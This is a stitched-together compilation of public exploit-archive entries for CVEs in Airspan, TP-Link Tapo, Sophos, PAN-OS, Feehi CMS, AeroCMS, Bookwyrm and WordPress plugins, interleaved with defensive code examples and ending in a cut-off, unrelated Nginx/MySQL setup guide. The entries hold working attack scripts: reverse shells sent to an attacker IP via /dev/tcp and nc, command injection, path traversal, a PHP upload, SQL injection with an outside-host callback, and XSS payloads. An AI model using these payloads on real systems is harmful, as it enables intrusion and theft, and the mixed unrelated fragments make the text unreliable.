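    return [field.decode("ascii", "replace") for field in frame.split(RS)]


def summarize(stream):
    """Return (kind, remaining_fields) for each frame, kind being the first field."""
    out = []
    for frame in split_frames(stream):
        fields = decode_frame(frame)
        out.append((fields[0], fields[1:]))
    return out


def typed_text(stream):
    """Collect the text carried by KEY frames of type '100'.

    In the PoC this is how a whole command line is typed into the focused
    window, so it is the field worth logging or alerting on.
    """
    texts = []
    for frame in split_frames(stream):
        fields = decode_frame(frame)
        if len(fields) >= 3 and fields[0] == "KEY" and fields[1] == "100":
            texts.append(fields[2])
    return texts


if __name__ == "__main__":
    for name, blob in (("CONN", CONN), ("RUN", RUN), ("SAMPLE", SAMPLE)):
        print(name, summarize(blob))
    print("typed:", typed_text(SAMPLE))
```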

Bookwyrm v0.4.3 - Authentication Bypass

# Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass
# Date: 2022-08-4
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm
# Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3
# Version: <= 4.0.3
# Tested on: MacOS Monterey
# CVE: CVE-2022-2651
# Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/

Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection

# Steps to reproduce:
1. Create an account with the victim's email id
2. When the account is created, it asks for email confirmation by validating an OTP
   Endpoint: https://site/confirm-email
3. Enter any random OTP and perform a brute-force attack; if the OTP matches, we can take over that account
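The report works because the confirm-email endpoint accepts an unlimited number of code submissions, so a short numeric code can simply be enumerated. The following is an added example, not Bookwyrm's code, of a confirmation-code store that compares in constant time, counts failures per account, and invalidates the code after a small number of misses, so the number of guesses an attacker can make is bounded regardless of request rate. `ConfirmationCodes`, its method names and the injected clock are assumptions made for this example.

```python
"""Attempt-limited, single-use, expiring confirmation codes."""
import hmac
import secrets
import time


class ConfirmationCodes:
    def __init__(self, max_attempts=5, ttl_seconds=900, clock=time.time):
        self.max_attempts = max_attempts
        self.ttl = ttl_seconds
        self.clock = clock          # injected so tests can control time
        self._codes = {}            # account -> {"code", "issued", "failures"}

    def issue(self, account, length=6):
        """Generate a fresh code from a CSPRNG and reset the failure counter.

        A 6-digit code has only 10**6 values; it is acceptable solely because
        verify() stops answering after max_attempts misses.
        """
        code = "".join(secrets.choice("0123456789") for _ in range(length))
        self._codes[account] = {"code": code, "issued": self.clock(), "failures": 0}
        return code

    def verify(self, account, submitted):
        """Return 'ok', 'invalid', 'locked', 'expired' or 'unknown'."""
        rec = self._codes.get(account)
        if rec is None:
            return "unknown"
        if self.clock() - rec["issued"] > self.ttl:
            del self._codes[account]
            return "expired"
        if rec["failures"] >= self.max_attempts:
            return "locked"
        # Constant-time comparison avoids leaking how many leading digits matched.
        if hmac.compare_digest(rec["code"], str(submitted)):
            del self._codes[account]        # single use
            return "ok"
        rec["failures"] += 1
        if rec["failures"] >= self.max_attempts:
            return "locked"                 # the real code is now useless; a new one must be issued
        return "invalid"


def brute_force_outcome(store, account, guesses):
    """Feed a sequence of guesses to verify() and return the distinct results seen.

    Used to show that once 'locked' appears, nothing but a new issue() helps.
    """
    return sorted({store.verify(account, g) for g in guesses})


if __name__ == "__main__":
    store = ConfirmationCodes(max_attempts=3)
    real = store.issue("user@example.com")
    print("guessing:", brute_force_outcome(store, "user@example.com", ["000000", "000001", "000002", real]))
```

Pair the per-account counter with a per-IP rate limit at the edge; the counter is what defeats a distributed guesser, the rate limit is what keeps the endpoint responsive.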
# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3

urllib3.disable_warnings()


def banner():
    # The original ASCII-art logo did not survive extraction; only its text lines are kept.
    airspanLogo = """
    Airspan AirSpot 5410
    PWNED x_x
    Necrum Security Labs
    \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
    \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m
    FOR EDUCATIONAL PURPOSE ONLY.
    """
    return print('\033[1;94m{}\033[1;m'.format(airspanLogo))


def pingWebInterface(RHOST, RPORT):
    url = 'https://{}:{}'.format(RHOST, RPORT)
    try:
        response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
        if response.status_code != 200:
            print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
            exit()
        print('[INFO] Airspan device web interface seems reachable!')
    except Exception:
        print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
        exit()


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
    # Payload appended to the targetIP field of the pingDiagnostic command
    payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
    data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
    try:
        print('[INFO] Executing reverse shell...')
        response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
        print("Reverse shell successfully executed.\n{}:{}".format(LHOST, LPORT))
        return
    except Exception as e:
        # The original called .format() on the return value of print(), which is None
        print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}".format(LHOST, LPORT))
        return False


def main():
    banner()
    args = parser.parse_args()
    pingWebInterface(args.RHOST, args.RPORT)
    execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Script PoC that exploits an unauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
    parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
    parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
    parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
    parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
    main()

TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)

# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
# Date: 02/11/2022
# Exploit Author: hacefresko
# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/
# Version: 1.1.15 and below
# Tested on: 1.1.11, 1.1.14 and 1.1.15
# CVE : CVE-2021-4045
# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce

import requests, urllib3, sys, threading, os

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

PORT = 1337
REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
NC_COMMAND = 'nc -lv %d' % PORT  # nc command to receive reverse shell (change it depending on your nc version)

if len(sys.argv) < 3:
    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")
    exit()

victim = sys.argv[1]
attacker = sys.argv[2]

print("[+] Listening on %d" % PORT)
t = threading.Thread(target=os.system, args=(NC_COMMAND,))
t.start()

print("[+] Serving payload to %s\n" % victim)
url = "https://" + victim + ":443/"
json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
requests.post(url, json=json, verify=False)
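The Airspan entry above (a ping target interpolated into a diagnostics command) and this Tapo entry (a language value interpolated into a single-quoted shell string) have the same fix: validate the parameter as the type it is supposed to be, then hand it to the program as its own argv element with no shell in between. The following is an added example, not vendor code. `ping_argv` uses `ipaddress.ip_address`, which rejects anything that is not a bare IP literal; `set_language_argv` checks a language tag against a regex; `/usr/bin/setlang` is a hypothetical device binary, and the ping flags assume Linux iputils.

```python
"""Keep request parameters out of the shell: validate, then pass as argv."""
import ipaddress
import re
import subprocess

LANG_RE = re.compile(r"^[a-z]{2,3}(?:-[A-Za-z]{2,4})?$")   # e.g. en, en-US, zh-Hans


def ping_argv(target, count=1, packet_size=56, timeout=10):
    """Validate every field of a ping-diagnostic request and build argv.

    ipaddress.ip_address raises ValueError for anything that is not a bare
    IPv4/IPv6 literal, so backticks, semicolons, spaces and $(...) never
    get past this line. Numeric fields are bounded to sane ranges.
    """
    ip = ipaddress.ip_address(target)
    count, packet_size, timeout = int(count), int(packet_size), int(timeout)
    if not (1 <= count <= 10 and 1 <= packet_size <= 1472 and 1 <= timeout <= 60):
        raise ValueError("parameter out of range")
    return ["ping", "-c", str(count), "-s", str(packet_size), "-W", str(timeout), str(ip)]


def set_language_argv(lang):
    """Accept only a well-formed language tag. No quoting step exists because
    nothing here is ever concatenated into a shell string."""
    if not LANG_RE.match(lang):
        raise ValueError("bad language tag: %r" % lang)
    return ["/usr/bin/setlang", lang]     # hypothetical helper binary on the device


def run_argv(argv, timeout=70):
    """Execute with shell=False so each argv element is passed literally to the program."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=timeout)


def rejects(fn, *args):
    """Helper for demonstrations and tests: True when fn raises ValueError for these arguments."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(ping_argv("1.1.1.1"))
    print("injected ping target rejected:", rejects(ping_argv, "1.1.1.1`id`"))
    print(set_language_argv("en-US"))
    print("injected language rejected:", rejects(set_language_argv, "';id;'"))
```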

Wifi HD Wireless Disk Drive 11 - Local File Inclusion

# Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
# Date: Aug 13, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.savysoda.com
# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
# Version: 11
# Tested on: iPhone OS 15_5

# Proof of Concept

GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.1.100
Connection: close
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1
Referer: http://192.168.1.103/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate

-----------------

HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Type: application/download
Content-Length: 213
Accept-Ranges: bytes
Date: Sat, 13 Aug 2022 03:33:30 GMT

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1       localhost
255.255.255.255 broadcasthost
::1             localhost
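The request above walks out of the shared folder with a run of `../` segments. The fix is to resolve the requested path against the share root on disk and refuse anything whose resolved form is not inside that root; decoding first matters because `%2e%2e/` and `..\` are other spellings of the same thing, and `realpath` matters because it collapses every `..` and follows symlinks before the comparison. The following is an added example, not the app's code; `resolve_within` and `serve` are hypothetical handlers and the share is a temporary directory created for the demonstration.

```python
"""Confine file downloads to a served directory."""
import os
import tempfile
from urllib.parse import unquote


def resolve_within(root, requested_path):
    """Return the absolute on-disk path for a URL path, or None if it escapes root."""
    root = os.path.realpath(root)
    # Decode percent-encoding once, treat backslashes as separators, drop the leading slash
    rel = unquote(requested_path).replace("\\", "/").lstrip("/")
    if not rel or "\x00" in rel:
        return None
    candidate = os.path.realpath(os.path.join(root, rel))
    # realpath() has already collapsed every "..", so a prefix check is sufficient,
    # and "root + os.sep" prevents /srv/share2 from passing for root /srv/share.
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def make_demo_share():
    """Create a throwaway share with one file so the check can be exercised."""
    share = tempfile.mkdtemp(prefix="wifihd-share-")
    with open(os.path.join(share, "notes.txt"), "w") as fh:
        fh.write("hello\n")
    return share


def serve(root, requested_path):
    """Mimic the download handler: (200, body), (403, b'') when the path escapes, (404, b'') when missing."""
    path = resolve_within(root, requested_path)
    if path is None:
        return 403, b""
    if not os.path.isfile(path):
        return 404, b""
    with open(path, "rb") as fh:
        return 200, fh.read()


if __name__ == "__main__":
    share = make_demo_share()
    for req in ("/notes.txt", "/../../../../../../../../etc/hosts", "/%2e%2e/%2e%2e/etc/passwd"):
        print(req, "->", serve(share, req)[0])
```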
HireHackking

Feehi CMS 2.1.1 - Remote Code Execution (Authenticated)

# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 22-08-2022 # Exploit Author: yuyudhn # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms # Version: 2.1.1 (REQUIRED) # Tested on: Linux, Docker # CVE : CVE-2022-34140 # Proof of Concept: 1. Login using admin account at http://feehi-cms.local/admin 2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex 3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate 4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php. 5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php # Burp request example: POST /admin/index.php?r=ad%2Fcreate HTTP/1.1 Host: feehi-cms.local Content-Length: 1530 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://feehi-cms.local Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; 
_csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D Connection: close ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="_csrf_backend" FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg== ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[name]" rce ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[tips]" rce at Ad management ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[input_type]" 1 ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]" ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php" Content-Type: image/png <?php phpinfo(); ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[link]" --------------
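The request above defeats a check that trusts the client: the file part claims `Content-Type: image/png` while the filename ends in `.php` and the body is PHP. A server cannot rely on either the filename or the declared type of a multipart part; it has to decide the type from the bytes, choose the extension itself, store the file under a generated name, and serve the upload directory without script execution. The following is an added example, not Feehi's code; `accept_upload` and the signature table are assumptions, and the sample parts reuse the values from the request above as constructed input.

```python
"""Server-side validation of an image upload that ignores client-supplied names and types."""
import secrets

# File signatures (magic bytes) for the image formats the form is allowed to accept.
ALLOWED = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
MAX_BYTES = 2 * 1024 * 1024


def sniff_image_type(data):
    """Return the extension for a recognised image signature, else None."""
    for magic, ext in ALLOWED.items():
        if data.startswith(magic):
            return ext
    return None


def accept_upload(filename, declared_type, data):
    """Decide whether to store an uploaded part.

    Returns (True, stored_name) or (False, reason). `filename` and
    `declared_type` come from the client and are used for the log message
    only; the stored name and extension never derive from them.
    """
    if len(data) == 0 or len(data) > MAX_BYTES:
        return False, "size"
    ext = sniff_image_type(data)
    if ext is None:
        return False, "not an image (declared %s, name %s)" % (declared_type, filename)
    # Heuristic defence in depth: a valid image with PHP appended is still
    # dangerous if the upload directory is ever executed by the web server.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded script"
    return True, secrets.token_hex(16) + ext


# Constructed multipart parts: the one from the request above, and a genuine PNG header.
PHP_PART = ("asuka.php", "image/png", b"<?php phpinfo();")
PNG_PART = ("asuka.php", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)


if __name__ == "__main__":
    for part in (PHP_PART, PNG_PART):
        print(part[0], "->", accept_upload(*part))
```

Storing under a random name also removes the second half of the attack chain, since the shell location in step 5 above depends on the attacker being able to predict or discover the saved filename.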
HireHackking

Aero CMS v0.0.1 - SQLi

# Title: Aero CMS v0.0.1 - SQLi
# Author: nu11secur1ty
# Date: 08.27.2022
# Vendor: https://github.com/MegaTKC
# Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi

# Description:
The `author` parameter of the AeroCMS v0.0.1 CMS is vulnerable to SQL injection. A malicious user can dump the database of this CMS and use it for further malicious purposes.

STATUS: HIGH Vulnerability

[+] Payload:

```mysql
---
Parameter: author (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
---
```
# Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/wp-useronline/
# Date: 2022-08-24
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
# Category: Web Application
# Version: 2.88.0
# Tested on: Debian / WordPress 6.0.1
# CVE : CVE-2022-2941
# Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c

# 1. Technical Description:
The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including, 2.88.0. This is because none of the fields in the "Naming Conventions" section properly sanitize user input or escape it on output. This makes it possible for authenticated attackers with administrative privileges to inject JavaScript code into the setting, which then executes whenever a user accesses the injected page.

# 2. Proof of Concept (PoC):
a. Install and activate version 2.88.0 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings).
c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use the following payload:
<script>alert(/XSS/)</script>
d. Save the changes and go to the Dashboard/WP-UserOnline option. As soon as you click it, your payload is executed.

Note: This change is permanent until you modify the edited fields.

Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass

# Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
# Date: 2022-08-04
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.sophos.com
# Version: 17.0.10 MR-10
# Tested on: Windows 11
# CVE : CVE-2022-1040

# [ VULNERABILITY DETAILS ] :
# This vulnerability allows an attacker to gain unauthorized access to the firewall management interface by bypassing authentication.

# [ SAMPLE REQUEST ] :
POST /webconsole/Controller HTTP/1.1
Host: 127.0.0.1:4444
Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: https://127.0.0.1:4444
Referer: https://127.0.0.1:4444/webconsole/webpages/login.jsp
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066

# [ KEY MODE ] :
\u0000eb, \u0000fc, \u0000, \u0000ef, ...

# [ Successful response ] :
HTTP/1.1 200 OK
Date: Thu, 04 Aug 2022 17:06:39 GMT
Server: xxxx
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 53
Set-Cookie: JSESSIONID=1jy5ygk6w0mfu1mxbv6n30ptal108;Path=/webconsole;Secure;HttpOnly
Connection: close

{"redirectionURL":"/webpages/index.jsp","status":200}
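The distinguishing feature of the sample request is the JSON key written as "mode\u0000ef": the JSON parser decodes that escape into a real NUL character inside the key, and the [ KEY MODE ] list shows it is the embedded control character that matters. No legitimate login client puts control characters in a JSON object key, which makes this a clean detection signal. The code below is an added example for this page, not Sophos code and not from the advisory: it parses a form body like the one above, loads the `json` field, and reports keys containing U+0000..U+001F or U+007F, the check a WAF rule or a log scan of /webconsole/Controller traffic can apply. Both request bodies are constructed for the example.

```python
import json
import urllib.parse

# Constructed request body modelled on the sample request above (not a captured one):
# the form field "json" carries an object whose last key embeds a \u0000 escape.
CONSTRUCTED_BODY = (
    'mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword",'
    '"languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,'
    '+"mode\\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066'
)
# A body a normal login form would send, for comparison (also constructed).
CLEAN_BODY = (
    'mode=151&json={"username"%3a"admin","password"%3a"x","languageid"%3a"1",'
    '"browser"%3a"Chrome_101","accessaction"%3a1}&__RequestType=ajax&t=1653896534066'
)


def control_char_keys(form_body: str, field: str = "json"):
    """Return the JSON object keys in `field` that contain control characters.

    JSON escapes such as \\u0000 are decoded by the parser, so the check runs on
    the decoded key; U+0000..U+001F and U+007F never appear in a legitimate key.
    """
    params = urllib.parse.parse_qs(form_body, keep_blank_values=True)  # decodes %3a and '+'
    flagged = []
    for raw in params.get(field, []):
        try:
            obj = json.loads(raw)
        except json.JSONDecodeError:
            continue                      # malformed JSON is a separate finding; not our concern here
        if not isinstance(obj, dict):
            continue
        for key in obj:
            if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in key):
                flagged.append(key)
    return flagged


def is_suspicious(form_body: str) -> bool:
    """Convenience predicate for a WAF rule or a log-scan filter."""
    return bool(control_char_keys(form_body))


if __name__ == "__main__":
    for label, body in (("constructed", CONSTRUCTED_BODY), ("clean", CLEAN_BODY)):
        print(label, [k.encode("unicode_escape").decode() for k in control_char_keys(body)])
```

When applying this to web server or proxy logs, note that the body is only visible if the logging layer records POST parameters; on the firewall itself the equivalent place to look is the request the management web application logged for the login endpoint.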

PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)

# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-08-13
# Exploit Author: UnD3sc0n0c1d0
# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038
# Category: Web Application
# Version: <10.0.1, <9.1.4 and <9.0.10
# Tested on: PAN-OS 10.0 - Parrot OS
# CVE : CVE-2020-2038
#
# Description:
# An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
# administrators to execute arbitrary OS commands with root privileges.
# More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
# Credits: Mikhail Klyuchnikov and Nikita Abramov of Positive Technologies for discovering and reporting this issue.

```python
#!/usr/bin/env python3
import requests
import urllib3
import sys
import getopt
import xmltodict

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def banner():
    print('\n###########################################################################')
    print('# Proof of Concept for CVE-2020-2038                                      #')
    print('# Vulnerability discovered by Mikhail Klyuchnikov and Nikita Abramov of   #')
    print('# Positive Technologies                                                   #')
    print('# https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ #')
    print('#                                                                         #')
    print('# Exploit by: Juampa Rodríguez (@UnD3sc0n0c1d0)                           #')
    print('###########################################################################')


def exploit(target, user, password, command):
    # obtain an API key for the given administrator credentials
    apiparam = {'type': 'keygen', 'user': user, 'password': password}
    apiresponse = requests.get(target + 'api/', params=apiparam, verify=False)
    xmlparse = xmltodict.parse(apiresponse.content)
    apikey = xmlparse['response']['result']['key']
    # the command is injected into the pattern of an operational "cms-ping" request
    payload = '<cms-ping><host>8.8.8.8</host><count>1</count><pattern>111<![CDATA[||' + command + '||]]></pattern></cms-ping>'
    parameters = {'cmd': payload, 'type': 'op', 'key': apikey}
    response = requests.get(target + 'api', params=parameters, verify=False)
    print(response.text[50:-20])


def usage():
    print('\nusage: CVE-2020-2038.py\n\n')
    print('arguments:')
    print('  -h    show this help message and exit')
    print('  -t    target URL (ex: http://vulnerable.host/)')
    print('  -u    target administrator user')
    print('  -p    password of the defined user account')
    print('  -c    command you want to execute on the target\n')


def main(argv):
    if len(sys.argv) < 9:
        banner()
        usage()
        sys.exit()
    try:
        opts, args = getopt.getopt(argv, "ht:u:p:c:")
    except getopt.GetoptError:
        banner()
        usage()
        sys.exit()
    for opt, arg in opts:
        if opt == '-h':
            usage()
            sys.exit()
        if opt == '-t':
            target = arg
        if opt == '-u':
            user = arg
        if opt == '-p':
            password = arg
        if opt == '-c':
            command = arg
    banner()
    exploit(target, user, password, command)
    sys.exit()


if __name__ == "__main__":
    try:
        main(sys.argv[1:])
    except KeyboardInterrupt:
        print('Interrupted by users...')
    except:
        sys.exit()
```
# Exploit Title: WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 08/08/2022
# Exploit Author: saitamang, syad, yunaranyancat
# Vendor Homepage: wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip
# Version: 1.0
# Tested on: Centos 7 apache2 + MySQL

The WordPress plugin "Netroics Blog Posts Grid" is prone to a stored cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

WordPress Plugin "Netroics Blog Posts Grid" version 1.0 is vulnerable; prior versions may also be affected.

Login as Editor > Add testimonial > Under Title, inject the payload below (post_title parameter) > Save Draft > Preview the post

payload --> user s1"><img src=x onerror=alert(document.cookie)>.gif

The draft post can be viewed with another Editor or Admin account, and the Stored XSS will be triggered.

Title: CentOS 7/8: Install Nginx, PHP 7.x and MySQL 8.0

There are many tutorials on this topic, but all of them have some gaps, and in practice you run into all kinds of pitfalls. To help you avoid them, this article presents a complete setup tutorial for beginners.
Installation environment
Nginx 1.2, PHP 7.x, MySQL 8.0
Installing Nginx
Add the CentOS 7 EPEL repository:
yum install epel-release
Install Nginx:
yum install nginx
Start the Nginx service:
systemctl start nginx
Enable Nginx at boot:
sudo systemctl enable nginx
Installing MySQL 8.0
Add the MySQL repository:
yum localinstall https://dev.mysql.com/get/mysql80-community-release-el7-1.noarch.rpm
Install MySQL:
yum --enablerepo=mysql80-community install mysql-community-server
Start MySQL:
systemctl start mysqld.service
Change the root password
